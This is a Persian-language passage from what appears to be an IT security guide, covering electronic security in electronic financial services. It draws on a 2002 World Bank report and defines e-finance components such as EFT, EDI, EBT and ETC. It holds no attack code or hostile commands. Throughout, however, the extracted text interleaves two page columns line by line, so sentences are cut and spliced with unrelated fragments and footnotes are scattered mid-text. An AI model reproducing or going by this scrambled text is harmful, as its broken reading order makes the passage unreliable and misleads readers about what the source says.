‫ﻫﺴﺘﻨﺪ‪ ،‬ﻭ ﺍﺭﺍﺋﻪ ﺑﻌﻀﻲ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻣﻤﻜﻦ ﺑﺮﺍﻱ ﻛﻢ ﻛﺮﺩﻥ ﺍﻳـﻦ‬
‫ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻭ ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ ﺍﻣﻨﻴﺖ ‪ -‬ﻛﺎﺭ ﻣﻲﻛﻨﻨـﺪ‬
‫ﺷﻜﺎﻓﻬﺎ ﻣﻲﭘﺮﺩﺍﺯﺩ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﺑﻌﻀﻲ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻛﻪ ﺩﺭ ﺳﺮﺍﺳﺮ‬ ‫ﺗﻬﻴﻪ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﻧﻜـﺎﺕ ﻓﻨـﻲ ﺍﻳـﻦ ﺑﺨـﺶ ﺑـﺮﺍﻱ ﻛـﺴﺎﻧﻴﻜﻪ‬
‫ﺟﻬﺎﻥ ﺑﺮﺍﻱ ﺭﻓﻊ ﺍﻳﻦ ﻧﮕﺮﺍﻧﻴﻬﺎ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﻧﺪ ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﺪ‪.‬‬ ‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺭﺍﻫﺒﺮﻱ ﻣﻲﻛﻨﻨـﺪ‪ ،‬ﺑﺎﺯﺭﺳـﻴﻦ‬
‫ﺑﺎﻧﻜﻬﺎ ﻛﻪ ﻛﺎﺭﺁﻳﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺍﺭﺯﻳـﺎﺑﻲ ﻣـﻲﻛﻨﻨـﺪ‪ ،‬ﻭ‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭼﻴﺴﺖ؟‬
‫ﻛﺴﺎﻧﻴﻜﻪ ﺑﺎ ﻣﺨﺎﻃﺮﺍﺕ ﺫﺍﺗﻲ ﻭ ﺭﻭﺯﻣﺮﺓ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﻫﺮ ﺍﺑﺰﺍﺭ‪ ،‬ﻓﻦ‪ ،‬ﻳـﺎ‬ ‫ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻧﺪ ﺑﺴﻴﺎﺭ ﺑﻜﺎﺭ ﻣﻲﺁﻳﺪ‪.‬‬
‫ﻓﺮﺁﻳﻨﺪﻱ ﻛﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺳـﺮﻣﺎﻳﻪﻫـﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﻳـﻚ‬
‫ﺳﻴﺴﺘﻢ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺭﺯﺵ‬ ‫ﺍﻣﻨﻴﺖ ﺩﺭ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﻳﻚ ﺷﺒﻜﻪ ﺭﺍ ﺯﻳﺎﺩ ﻣـﻲﻛﻨـﺪ ﻭ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﻧـﺮﻡ ﻭ ﺳـﺨﺖ‬ ‫ﺩﺭ ﭼﻨﺪ ﻣﻘﺎﻟـﺔ ﺟﺪﻳـﺪ‪ ،‬ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻌﻨـﻮﺍﻥ ﻣـﺴﺌﻠﻪﺍﻱ‬
‫ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﻧـﺮﻡ ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ‪،‬‬ ‫ﺣﻴﺎﺗﻲ ﺩﺭ ﺗﻮﺍﻧﻤﻨﺪ ﺳﺎﺧﺘﻦ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪ ٢٠‬ﺑـﺮﺍﻱ‬
‫ﻓﺮﺁﻳﻨﺪﻫﺎ‪ ،‬ﭘﺮﻭﺗﻜﻠﻬﺎ ﻭ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ‬
‫ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺍﻧﺘﻈـﺎﺭﺍﺕ ﺳـﺎﺯﻣﺎﻥ ﻭ ﻣـﺸﺘﺮﻳﺎﻥ ﻭ ﺍﺭﺍﺋـﻪ ﻣﻨـﺎﻓﻊ‬
‫ﮔﺮﻓﺘﻦ ﺳﻴﺴﺘﻢ ﻭ ﺩﺍﺩﻩﻫـﺎ ﺟﻠـﻮﮔﻴﺮﻱ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ‬ ‫ﻓﻨﺎﻭﺭﻱ ﻣﻌﺮﻓﻲ ﺷﺪﻩ ﺑﻮﺩ‪ ٢١.‬ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎ ﻗﻠـﺐ ﺍﻗﺘـﺼﺎﺩ‬
‫ﺳﺨﺖ ﻧﻴﺰ ﻣﺘﺸﻜﻞ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻭ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﺑـﺮﺍﻱ‬

‫ﺍﻳﻦ ﺭﺳﺎﻟﻪ ﺍﻭﺝ ﺗﻼﺷﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺳﻪ ﺳﺎﻝ ﺍﺧﻴﺮ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﻭ ﺑـﻪ‬ ‫ﺍﻳــﻦ ﻓــﺼﻞ ﺑــﺎ ﻛﻤــﻚ ﻳــﻚ ﮔــﺰﺍﺭﺵ ﻛــﻪ ﺑﻮﺳــﻴﻠﺔ ‪Thomas‬‬ ‫‪۱۹‬‬
‫ﺍﺭﺍﺋﻪ ﭼﻨﺪ ﻣﻘﺎﻟﻪ ﻣﻨﺠﺮ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﭼﻨـﺪ ﻣﻘﺎﻟـﺔ ﺩﻳﮕـﺮ ﺍﺯ ﺍﻳـﻦ ﺩﺳـﺘﻪ‬ ‫‪ ،Tom Kellerman ،Glaessner‬ﻭ ‪Valerie McNevin‬‬
‫ﻣﻘﺎﻻﺕ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬ ‫ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۲‬ﺑﺮﺍﻱ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺗﻬﻴﻪ ﺷﺪ ﺑﻪ ﻧﮕﺎﺭﺵ ﺩﺭ ﺁﻣﺪﻩ ﺍﺳﺖ‪:‬‬
‫‪“Electronic Security: Risk Mitigation in‬‬ ‫‪"Electronic Security: Risk Mitigation in‬‬
‫‪Financial Transactions” (May 2002, June‬‬ ‫‪Financial Transactions.":‬‬
‫‪2002, July 2002),‬‬ ‫‪http://wbln0018.worldbank.org/html/FinancialS‬‬
‫‪“Electronic Finance: A New Approach to‬‬ ‫‪ectorWeb.nsf/SearchGeneral?openform&E-‬‬
‫‪Financial Sector Development?” (2002),‬‬ ‫‪Security/E-Finance&Publications‬‬
‫‪“Mobile Risk Management: E-Finance in the‬‬ ‫‪20‬‬ ‫‪E-Finance‬‬
‫)‪Wireless Environment” (May 2002‬‬ ‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ‪ ،‬ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ‪ Kellerman ،Glaessner‬ﻭ‬ ‫‪۲۱‬‬
‫ﻛﻪ ﻫﻤﮕﻲ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻫﺴﺘﻨﺪ‪:‬‬ ‫‪ McNevin‬ﺍﺯ ﺟﻤﻠﻪ ﻛﺘﺎﺏ ﺯﻳﺮ ﺭﺍ ﺑﺒﻴﻨﻴﺪ‪:‬‬
‫‪http://www.worldbank1.org/finance‬‬ ‫‪"Electronic Safety and Soundness: Securing‬‬
‫‪22‬‬ ‫‪Privacy‬‬ ‫"‪Finance in a Digital Age, Public Policy Issues‬‬
‫‪23‬‬ ‫‪Return on Investment‬‬ ‫)‪(October 2003‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٢٨‬‬

‫ﻫﻤﺎﻥ ﺗﻌﺪﺍﺩ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺭﺍ ﺩﺭ ﺗﻨﻬﺎ ﭼﻨـﺪ ﺛﺎﻧﻴـﻪ ﺑـﻪ ﺳـﺮﻗﺖ‬ ‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻢ ﻭ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺍﺧﻠـﻲ‬
‫ﺑﺒﺮﺩ‪.‬‬ ‫ﻭ ﺧﺎﺭﺟﻲ ﺳﺎﺯﻣﺎﻥ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑﺎﻳﺪ ﺗﻮﺟﻪ ﺩﺍﺷﺖ ﻛﻪ ﺳﻄﺢ ﺍﻣﻨﻴـﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻫﺮ ﻓﻌﺎﻟﻴﺖ ﺑﺎﻳﺪ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﺍﺭﺯﺵ ﺁﻥ ﻓﻌﺎﻟﻴﺖ ﺑﺎﺷﺪ؛‬
‫ﺑﺮ ﺍﺳﺎﺱ ﺑﺮﺭﺳﻴﻬﺎﻱ ﺍﺧﻴﺮ ﺗﺨﻤـﻴﻦ ﺯﺩﻩ ﻣـﻲﺷـﻮﺩ ﻛـﻪ ‪ %۵۷‬ﺍﺯ‬
‫ﺑﻨــﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴــﺖ ﺑــﺮﺍﻱ ﺗﺮﺍﻛﻨــﺸﻬﺎ ﻭ ﻣﻌــﺎﻣﻼﺕ ﻣﻬــﻢ ﺑﺎﻳــﺪ ﺩﺭ‬
‫ﺣﻤﻼﺕ ﻧﻔﻮﺫ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺩﺭ ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﺍﺯ ﺑﺨﺸﻬﺎﻱ ﻣـﺎﻟﻲ‬
‫ﺳﻄﺤﻲ ﺑﺎﻻﺗﺮ ﺍﺯ ﺗﺮﺍﻛﻨﺸﻬﺎ ﻭ ﻣﻌﺎﻣﻼﺕ ﻋﺎﺩﻱ ﺗﺄﻣﻴﻦ ﺷﻮﺩ‪.‬‬
‫ﺷﺮﻭﻉ ﺷﺪﻩ ﺑﻮﺩﻧﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﺨﻠﻔﺎﺕ ﻧﻈﻴﺮ ﻳـﻚ ﻣـﻮﺭﺩ ﺟـﺪﻱ‬
‫ﻛﻪ ﺩﺭ ﻭﺯﺍﺭﺕ ﺧﺰﺍﻧـﻪﺩﺍﺭﻱ ﺁﻣﺮﻳﻜـﺎ ﺭﺥ ﺩﺍﺩ ﻧﺎﺷـﻲ ﺍﺯ ﺍﺷـﺘﺒﺎﻩ ﺩﺭ‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻳﻚ ﻓﻨﺎﻭﺭﻱ ﺟﺪﻳﺪ ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻳﺪﻱ ﻧﻴﺰ‬
‫ﭘﻴــﺎﺩﻩﺳــﺎﺯﻱ ﺭﻭﻧــﺪﻫﺎﻱ ﺍﺭﺯﻳــﺎﺑﻲ ﻣﺨــﺎﻃﺮﻩ ﻭ ﺑﻜــﺎﺭﮔﻴﺮﻱ‬
‫ﺑﻮﺟــﻮﺩ ﻣــﻲﺁﻭﺭﺩ ﻭ ﻓﻨﺎﻭﺭﻳﻬــﺎ ﻫــﺮ ﺭﻭﺯ ﮔــﺴﺘﺮﺩﻩﺗــﺮ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﺁﻣـﺎﺩﻩ ﺑـﺪﻭﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﻳﻜﺮﺩﻫـﺎﻱ‬
‫ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻟﺬﺍ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺷﺎﻳـﺴﺘﺔ ﺗﻮﺟـﻪ‬
‫ﭼﻨﺪﻻﻳــﺔ ﺍﻣﻨﻴﺘــﻲ ‪ -‬ﻣــﻮﺍﺭﺩﻱ ﭼــﻮﻥ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻛﺎﺭﻛﻨــﺎﻥ‪،‬‬
‫ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ‪ ،‬ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣـﻨﻈﻢ ﺍﺑـﺰﺍﺭ ﻓﻨـﻲ ﻣـﻮﺭﺩ‬
‫ﺑﻴﺸﺘﺮﻱ ﺍﺳﺖ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﺎﻧﻨﺪ ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ‪ ٢٨‬ﻭ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ‪ - ٢٩‬ﺑﻮﺩﻧـﺪ‪.‬‬ ‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺑﻜـﺎﺭ ﺑـﺮﺩﻥ ﻭﺳـﺎﻳﻞ‬
‫ﻧﺘﺎﻳﺞ ﺍﻳﻦ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺍﺧﺒﺎﺭ ﺁﻥ ﺑﻪ ﺭﺳﺎﻧﻪﻫﺎ ﻧﻴﺰ ﺭﺍﻩ ﭘﻴﺪﺍ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﺮﺍﻱ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ‪ ،‬ﺍﻧﺘﻘـﺎﻝ ﻋﻼﺋـﻢ ﻭ ﺍﺳـﻨﺎﺩ‬
‫ﻛﺮﺩ ﻃﻴﻔﻲ ﺷﺪ ﻛﻪ ﻳﻜﺴﻮﻱ ﺁﻥ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺷﻬﺮﺕ ﻭ ﺍﻋﺘﺒـﺎﺭ‬ ‫ﺍﻋﺘﺒﺎﺭﻱ‪ ،‬ﻭ ﺍﻧﺠﺎﻡ ﺩﺍﺩ ﻭ ﺳﺘﺪ ﺩﺭ ﻳﻚ ﻣﺤـﻴﻂ ﺗﺠـﺎﺭﻱ‪ .‬ﺧـﺪﻣﺎﺕ‬
‫ﻣﺎﻟﻲ ﻭ ﺳﻮﻱ ﺩﻳﮕﺮ ﺁﻥ ﺗﻐﻴﻴﺮ ﺭﻓﺘﺎﺭ ﻧﻬﺎﻥ ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭ ﻣﻘﺎﺑﻠﻪ ﺑـﺎ‬ ‫ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﭼﻬﺎﺭ ﺟﺰﺀ ﭘﺎﻳﻪﺍﻱ ﺗﺸﻜﻴﻞ ﻣﻲﺷﻮﺩ‪:‬‬
‫ﺩﺍﺩ ﻭ ﺳﺘﺪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻮﺩ؛ ﻭ ﺍﻳﻦ ﻫﻤﻪ ﺩﻟﻴﻠﻲ ﻧﺪﺍﺷﺖ ﺟﺰ ﻋـﺪﻡ‬
‫ﺍﻋﺘﻤﺎﺩ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﻪ ﻭﺍﺳـﻄﻪﻫـﺎﻱ ﺗﺠـﺎﺭﺕ ﻭ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ‬ ‫ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﻩﻫﺎﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ )‪٢٤(EFTs‬؛‬ ‫•‬

‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪.‬‬ ‫ﺗﺒﺎﺩﻝ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ )‪٢٥(EDI‬؛‬ ‫•‬


‫ﺍﻧﺘﻘﺎﻝ ﻣﻨﺎﻓﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ )‪٢٦(EBTs‬؛ ﻭ‬ ‫•‬
‫ﺍﻗﺘﺼﺎﺩ ﺷﺒﻜﻪﺍﻱ‪ ،‬ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺛﺮﻭﺕ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻧﺠﺎﻡ ﺳﺮﻗﺖ ﻭ‬ ‫ﺗﺼﺪﻳﻖ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ )‪.٢٧(ETCs‬‬ ‫•‬
‫ﺗﺨﺮﻳﺐ‪ ،‬ﻓﺮﺻﺘﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺭ ﺑﺮﺭﺳﻲ ﻣﺰﺍﻳـﺎ ﻭ‬
‫ﻣﻌﺎﻳﺐ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ‪ ،‬ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﻭ ﺗﺼﻤﻴﻤﮕﻴﺮﺍﻥ ﺑﺎﻳـﺪ ﺁﮔـﺎﻫﻲ‬ ‫ﺍﮔﺮﭼﻪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳـﻚ ﻓﺮﺻـﺖ ﺑـﺰﺭﮒ ﺟﻬـﺖ‬
‫ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣـﻮﺭﺩ ﻧﻘـﺸﻲ ﻛـﻪ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ ﺗـﻀﻤﻴﻦ‬ ‫ﮔﺴﺘﺮﺵ ﺗﺠﺎﺭﺕ ﺑﺮﺍﻱ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ‪،‬‬
‫ﺩﺍﺩ ﻭ ﺳﺘﺪﻫﺎﻱ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺗﺠﺎﺭﻱ ﺑﺎﺯﻱ ﻣـﻲﻛﻨـﺪ ﺍﻓـﺰﺍﻳﺶ‬ ‫ﺍﻣﺎ ﭼﻨﺪ ﻣﺨﺎﻃﺮﺓ ﺟﺪﻱ ﻧﻴﺰ ﺑﺪﻧﺒﺎﻝ ﺩﺍﺭﺩ‪ .‬ﺗﻤﺎﻡ ﭼﻬﺎﺭ ﺟﺰﺀ ﺧﺪﻣﺎﺕ‬
‫ﺩﻫﻨﺪ‪.‬‬ ‫ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣـﺴﺘﻌﺪ ﻛﻼﻫﺒـﺮﺩﺍﺭﻱ‪ ،‬ﺳـﺮﻗﺖ‪ ،‬ﺍﺧـﺘﻼﺱ‪ ،‬ﻭ‬
‫ﺩﺳﺘﻜﺎﺭﻱ ﻫﺴﺘﻨﺪ‪ .‬ﺑﻴﺸﺘﺮ ﺟـﺮﺍﺋﻢ ﺗﺠـﺎﺭﻱ ﻛـﻪ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺭﺥ‬
‫ﺻــﻨﻌﺖ ﺍﻣﻨﻴــﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺩﺭﺣــﺎﻝ ﺭﺷــﺪ ﻭ‬ ‫ﻣﻲﺩﻫﻨﺪ ﺗﺎﺯﮔﻲ ﭼﻨﺪﺍﻧﻲ ﻧﺪﺍﺭﻧﺪ ‪ -‬ﻛﻼﻫﺒﺮﺩﺍﺭﻱ‪ ،‬ﺳـﺮﻗﺖ‪ ،‬ﺟﻌـﻞ‬
‫ﺟﻬﺎﻧﻲﺷﺪﻥ ﺍﺳﺖ؛ ﻟﺬﺍ ﭼﺎﻟﺸﻬﺎﻱ ﺳﻴﺎﺳﺖ ﻋﻤـﻮﻣﻲ‬ ‫ﻫﻮﻳﺖ‪ ،‬ﻭ ﺍﺧﺎﺫﻱ ﺳﺎﻟﻬﺎﺳﺖ ﻛﻪ ﺻﻨﺎﻳﻊ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺭﺍ ﺑﻪ ﺳﺘﻮﻩ‬
‫ﺭﺍ ﺩﺭ ﺣﻮﺯﻩﻫﺎﻱ ﺳﻴﺎﺳﺖ ﺭﻗﺎﺑﺘﻲ‪ ،‬ﺗﻌﺎﺭﺿﻬﺎﻱ ﺑـﺎﻟﻘﻮﺓ‬ ‫ﺁﻭﺭﺩﻩﺍﻧﺪ ‪ -‬ﺍﻣﺎ ﺑـﺎ ﺍﻳﻨﻬﻤـﻪ‪ ،‬ﭘﻴـﺸﺮﻓﺖ ﻓﻨـﺎﻭﺭﻱ ﻫﻤـﻮﺍﺭﻩ ﺑﺎﻋـﺚ‬
‫ﻣﻨﺎﻓﻊ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻲ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ‪.‬‬ ‫ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﺍﺑﻌﺎﺩ ﺟﺪﻳﺪﻱ ﻣﻲﮔـﺮﺩﺩ ﻭ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﻋﻤﻖ ﻭ ﺩﺍﻣﻨﺔ ﺟﺮﺍﺋﻢ ﺭﺍ ﮔﺴﺘﺮﺩﻩﺗﺮ ﻛﻨﺪ‪ .‬ﻓﻨﺎﻭﺭﻱ ﺑﺎﻋﺚ ﻣﻲﺷـﻮﺩ‬
‫ﺩﺭ ﮔﺬﺷــﺘﺔ ﻧﺰﺩﻳــﻚ ﺷــﺮﻛﺘﻬﺎﻱ ﺍﺭﺍﺋــﻪﺩﻫﻨــﺪﺓ ﺧــﺪﻣﺎﺕ ﺍﻣﻨﻴــﺖ‬ ‫ﺟﻨﺎﻳﺘﻬﺎﻱ ﺑﺴﻴﺎﺭ ﮔﺴﺘﺮﺩﻩ ﻭ ﭘﻴﭽﻴﺪﻩ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺴﺮﻋﺖ ﻭ ﺑـﺼﻮﺭﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﻤﻮﻣﹰﺎ ﺩﺭ ﺳﻪ ﺣﻮﺯﻩ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﺮﺩﻧـﺪ‪ :‬ﺩﺳﺘﺮﺳـﻲ‪،‬‬ ‫ﮔﻤﻨﺎﻡ ﺍﻧﺠﺎﻡ ﺷﻮﻧﺪ‪ .‬ﺩﺭ ﮔﺬﺷﺘﻪ ﺳﺮﻗﺖ ‪ ۵۰,۰۰۰‬ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ‪ ،‬ﻭ ﺍﺭﺯﻳﺎﺑﻲ‪ .‬ﻋﻼﻭﻩ ﺑـﺮ ﺍﻳﻨﻬـﺎ‪ ،‬ﺻـﻨﻌﺖ ﺍﻣـﺮﻭﺯﻱ ﺷـﺎﻣﻞ‬ ‫ﺑﺮﺍﻱ ﺟﻨﺎﻳﺘﻜﺎﺭﺍﻥ ﺑﺴﻴﺎﺭ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﻣﺎﻫﻬﺎ ﻳﺎ ﺣﺘﻲ ﺳﺎﻟﻬﺎ ﺯﻣـﺎﻥ‬
‫ﺷﺮﻛﺘﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺧﺪﻣﺎﺗﻲ ﺩﻳﮕـﺮ ﻧﻴـﺰ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﺍﺭﺍﺋـﻪ‬ ‫ﻣﻲﺑﺮﺩ؛ ﺍﻣﺎ ﺍﻣﺮﻭﺯ ﻳﻚ ﻣﺠﺮﻡ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺭﺍﻳﮕـﺎﻥ ﺩﺭ‬
‫ﻣــﻲﻛﻨﻨــﺪ؛ ﺧــﺪﻣﺎﺗﻲ ﺍﺯ ﻗﺒﻴــﻞ ﻧﻈــﺎﺭﺕ ﻭ ﻏﺮﺑــﺎﻝ ﻛــﺮﺩﻥ ﺩﺍﺩﻩ‪،‬‬ ‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻧﻔﻮﺫ ﺑـﻪ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩﻫـﺎﻱ ﻫﻮﻳـﺖ‪،‬‬
‫ﻣﻬﺎﺟﻢﻳﺎﺑﻲ‪ ،‬ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗـﺶ‪ ،‬ﺁﺯﻣﻮﻧﻬـﺎﻱ ﻧﻔﻮﺫﭘـﺬﻳﺮﻱ ﺑـﺮﺍﻱ‬
‫ﺑﺮﺭﺳﻲ ﻣﻴـﺰﺍﻥ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻱ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﺳـﺨﺖﺍﻓﺰﺍﺭﻫـﺎ‪،‬‬
‫‪24‬‬ ‫‪Electronic Funds Transfers‬‬
‫‪25‬‬ ‫‪Electronic Data Interchange‬‬
‫‪28‬‬ ‫‪Virus Scanners‬‬ ‫‪26‬‬ ‫‪Electronic Benefits Transfers‬‬
‫‪29‬‬ ‫‪Firewalls‬‬ ‫‪27‬‬ ‫‪Electronic Trade Confirmations‬‬
‫‪١٢٩‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

